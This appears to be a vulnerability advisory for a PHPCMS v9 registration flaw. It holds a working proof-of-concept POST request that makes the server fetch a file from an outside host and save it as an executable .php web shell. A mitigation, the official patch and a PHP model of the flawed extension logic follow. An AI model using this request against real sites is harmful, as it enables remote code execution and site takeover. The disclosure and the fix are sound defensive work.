PHPCMS v9 front-end getshell (remote image download in member registration)

POC:

siteid=1&modelid=11&username=newbie&password=newbie&email=newbie@qq.com&info[content]=<img src=http://shhdmqz.com/newbie.txt?.php#.jpg>&dosubmit=1&protocol=


Full POST request:

POST /index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1
Host: 127.0.0.1
Content-Length: 297
Cache-Control: max-age=0
Origin: http://192.168.87.128
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://127.0.0.1/index.php?m=member&c=index&a=register&siteid=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,es;q=0.6,fr;q=0.4,vi;q=0.2
Cookie: PHPSESSID=h5jo0216vveqr9blnh146tq5q5
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Originating-IP: 127.0.0.1
Connection: close

siteid=1&modelid=2&username=520520&password=5205201&pwdconfirm=5205201&email=52052096%40163.com&nickname=52096&dosubmit=%E5%90%8C%E6%84%8F%E6%B3%A8%E5%86%8C%E5%8D%8F%E8%AE%AE%EF%BC%8C%E6%8F%90%E4%BA%A4%E6%B3%A8%E5%86%8C&protocol=&info[content]=<img src=http://www.96sec.org/md5.txt?.php#.jpg>



Copied image address after registration (the remote file has been saved under uploadfile/ with a .php extension): http://127.0.0.1/uploadfile/2017/0411/20170411015048242.php


Fix

Temporary mitigation:

Disable the registration page.

Disable remote fetching through URL wrappers, i.e. set allow_url_fopen = Off, so the attachment downloader can no longer pull the remote file.

Permanent fix:

Edit the download function in phpcms/libs/classes/attachment.class.php. Inside the foreach($remotefileurls as $k=>$file) loop (around line 167), the extension of the saved file is taken from $file, which is the URL after the '#' fragment has been stripped:

    if(strpos($file, '://') === false || strpos($file, $upload_url) !== false) continue;
    $filename = fileext($file);

Change the fileext() call so the extension is taken from $k instead, the originally matched string, which still ends in the image extension the regex accepted:

    $filename = fileext($k);
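To trace why the POC above is stored as a .php file, and why taking the extension from $k closes the hole, here is an added stand-alone PHP model of the relevant logic. This is example code written for this page, not PHPCMS's own code: fileext() and the fragment stripping of fillurl() are reproduced as they are in PHPCMS v9, the regex is the one download() applies to submitted content, and the rest of download() (directory creation, the copy() call, rewriting of the content) is left out. The "hardened" variant with a whitelist check is my own addition, not part of the official patch. With the POC's info[content] value the chain is: the regex only accepts a src that ends in an image extension, which the '#.jpg' fragment supplies; fillurl() drops everything from '#' before the fetch, so $file is http://shhdmqz.com/newbie.txt?.php; fileext($file) looks at the last '.' and returns php, while fileext($k) still sees the original string and returns jpg.

```php
<?php
// Added example, not PHPCMS's own code: a stand-alone model of the pieces of
// attachment::download() that the POC exercises. fileext() and the fragment
// handling of fillurl() are reproduced as in PHPCMS v9; the regex is the one
// download() applies to the submitted content. Everything else is simplified.

// PHPCMS fileext(): the extension is up to 10 chars after the LAST '.' in the string.
function fileext($filename) {
    return strtolower(trim(substr(strrchr($filename, '.'), 1, 10)));
}

// The part of fillurl() that matters here: the '#fragment' is cut off before
// the URL is fetched, while the '?query' part is kept.
function strip_fragment($surl) {
    $i = strpos($surl, '#');
    if ($i !== false) $surl = substr($surl, 0, $i);
    return $surl;
}

// download() only picks up src/href values that END with an allowed image
// extension; '#.jpg' satisfies that. Returns original string => fetch URL,
// the same shape as $remotefileurls ($k => $file) in the loop being patched.
function extract_remote_urls($content, $ext = 'gif|jpg|jpeg|bmp|png') {
    $urls = array();
    if (!preg_match_all("/(href|src)=([\"|']?)([^ \"'>]+\.($ext))\\2/i", $content, $m)) {
        return $urls;
    }
    foreach ($m[3] as $matche) {
        if (strpos($matche, '://') === false) continue;   // not a remote URL, skipped
        $urls[$matche] = strip_fragment($matche);
    }
    return $urls;
}

// Vulnerable: extension taken from the fetch URL ($file), i.e. after '#.jpg' is gone.
function saved_ext_vulnerable($k, $file) {
    return fileext($file);
}

// Official fix: extension taken from the originally matched string ($k).
function saved_ext_fixed($k, $file) {
    return fileext($k);
}

// Defence in depth (my addition, not the PHPCMS patch): only accept an
// extension that is actually on the whitelist the regex was meant to enforce.
function saved_ext_hardened($k, $file, $ext = 'gif|jpg|jpeg|bmp|png') {
    $e = fileext($k);
    return in_array($e, explode('|', $ext), true) ? $e : null;
}

// Constructed input: the info[content] value from the POC above.
$content = '<img src=http://shhdmqz.com/newbie.txt?.php#.jpg>';

foreach (extract_remote_urls($content) as $k => $file) {
    echo "matched  : $k\n";
    echo "fetched  : $file\n";
    echo "vuln ext : " . saved_ext_vulnerable($k, $file) . "\n";
    echo "fixed ext: " . saved_ext_fixed($k, $file) . "\n";
    echo "hardened : " . var_export(saved_ext_hardened($k, $file), true) . "\n";
}
```

Save it under any file name and run it with the php CLI; change $content to any other src value to see which inputs the regex accepts and what extension each path of the code would assign to the saved file.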

